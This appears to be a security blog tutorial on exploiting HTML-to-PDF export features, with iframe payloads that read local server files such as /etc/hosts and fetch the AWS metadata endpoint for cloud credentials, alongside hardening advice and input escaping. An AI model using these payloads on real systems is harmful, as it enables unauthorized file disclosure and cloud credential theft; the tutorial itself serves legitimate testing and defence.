A lot of web applications have some sort of PDF export functionality. This type of feature shows up all over the place: creating invoices, behavior reports, analytics reports, dashboard exports, log exports, generated certificates, and much more. If done incorrectly, attackers can leverage it for local file inclusion (LFI), server-side request forgery (SSRF), and more. I'll be focusing on HTML to PDF converters, as that's how a lot of these applications implement the feature.
Converting HTML to PDF is the process of rendering an HTML page (which might contain CSS, JavaScript, images, etc.) into a static, printable, paginated PDF document. There are several ways of doing this. One is to use a headless browser such as Chrome to load the HTML and print a PDF. Doing it this way lets you handle CSS, JavaScript, and everything else, which might sound good but can lead to security issues.
The second way is to use a command-line tool like wkhtmltopdf, which uses a WebKit engine to render the HTML and print the PDF. This kind of option can also execute JavaScript. Finally, you can use something that doesn't execute JavaScript; this is the safest way and will prevent most vulnerabilities.
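To make the command-line option concrete, here is a minimal sketch of how an application might build a locked-down wkhtmltopdf invocation. The function name and file names are hypothetical, and the two flags shown (`--disable-javascript` and `--disable-local-file-access`) should be checked against the wkhtmltopdf version you actually run, since defaults have changed between releases.

```python
from typing import List


def wkhtmltopdf_command(input_html: str, output_pdf: str) -> List[str]:
    """Build an argument list for a restricted wkhtmltopdf run (hypothetical helper)."""
    return [
        "wkhtmltopdf",
        "--disable-javascript",         # do not execute scripts found in the page
        "--disable-local-file-access",  # stop the page from pulling in other local files
        input_html,
        output_pdf,
    ]


cmd = wkhtmltopdf_command("report.html", "report.pdf")

# To actually run it (requires wkhtmltopdf to be installed):
#   import subprocess
#   subprocess.run(cmd, check=True, timeout=30)
```

Passing the arguments as a list rather than a shell string also keeps user-controlled file names from being interpreted by a shell.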
Vulnerabilities can be introduced when the HTML being rendered contains malicious markup or JavaScript code. If an application takes unsanitized user input and inserts it into the HTML used to generate the report, an attacker controls part of what the converter renders on the server.
One of the first things to check for is LFI. If you have LFI it's pretty much game over, because you will be able to read any file the converter process can access on the web server, including source code, config files with passwords, and anything else.
Check to see if you can embed an iframe. You can use iframes to load and display local files. For example, if you are able to embed an iframe such as <iframe src="file:///etc/hosts"></iframe>, you will be able to read the /etc/hosts file.
Look at the code above. You can see that user input is being added to the HTML template without being sanitized. This means that you can insert your own HTML tags. As explained above, if you insert an iframe you will be able to read local files. Since the PDF is generated on the web server, this allows you to read files on the server.
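The pattern described above can be sketched in a few lines. This is only an illustration under assumptions: the template, the `name` field, and both function names are hypothetical and not taken from any particular application. It contrasts dropping user input straight into the markup with escaping it first using the standard library's `html.escape`.

```python
import html

# Hypothetical report template with a single user-controlled field.
TEMPLATE = "<html><body><h1>Report for {name}</h1></body></html>"


def render_vulnerable(name: str) -> str:
    # User input is placed into the markup as-is, so any tags it contains survive.
    return TEMPLATE.format(name=name)


def render_escaped(name: str) -> str:
    # html.escape converts <, >, & and quotes to entities, so the input stays text.
    return TEMPLATE.format(name=html.escape(name))


payload = '<iframe src="file:///etc/hosts"></iframe>'
vulnerable_html = render_vulnerable(payload)  # contains a live <iframe> tag
escaped_html = render_escaped(payload)        # contains &lt;iframe ... as plain text
```

When the vulnerable output is handed to a converter, the iframe is rendered on the server; the escaped output just prints the payload as text in the PDF.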
As shown in the image above, when I type in <iframe src="file:///etc/hosts" width="100%" height="400px"></iframe> it gets embedded into the PDF, allowing me to read files on the system.
In addition to LFI, you can also do other things like server-side request forgery (SSRF). SSRF can be used to send an HTTP request from the server and read the response. This is often used to read the metadata endpoint on cloud providers like AWS, which can expose cloud credentials. As before, we can use the same iframe trick, but this time point it at the AWS metadata endpoint.
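As a rough sketch of that payload, the helper below builds the same iframe used for the file read but with an HTTP source. The `iframe_payload` function is hypothetical; the address is the link-local one used by the AWS instance metadata service. A plain iframe can only issue a simple GET, so this assumes the instance still accepts IMDSv1-style requests (IMDSv2 requires a session token obtained with a PUT request).

```python
import html

# Link-local address of the AWS instance metadata service.
AWS_METADATA_URL = "http://169.254.169.254/latest/meta-data/"


def iframe_payload(src: str, width: str = "100%", height: str = "400px") -> str:
    """Return an iframe tag pointing at `src` (hypothetical helper for testing)."""
    return '<iframe src="{}" width="{}" height="{}"></iframe>'.format(
        html.escape(src, quote=True), width, height
    )


ssrf_payload = iframe_payload(AWS_METADATA_URL)   # server fetches the metadata endpoint
lfi_payload = iframe_payload("file:///etc/hosts")  # same trick, local file instead
```

If the rendered PDF shows the metadata directory listing inside the frame, the converter is making requests from inside the cloud network on your behalf.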
If an application has PDF export capabilities, there is a good chance it is using an HTML to PDF converter. If it is also inserting unsanitized user input into the HTML template used to generate the report, there could be several security issues. Since most HTML to PDF converters render embedded content and allow executing JavaScript, you can probably find LFI or SSRF.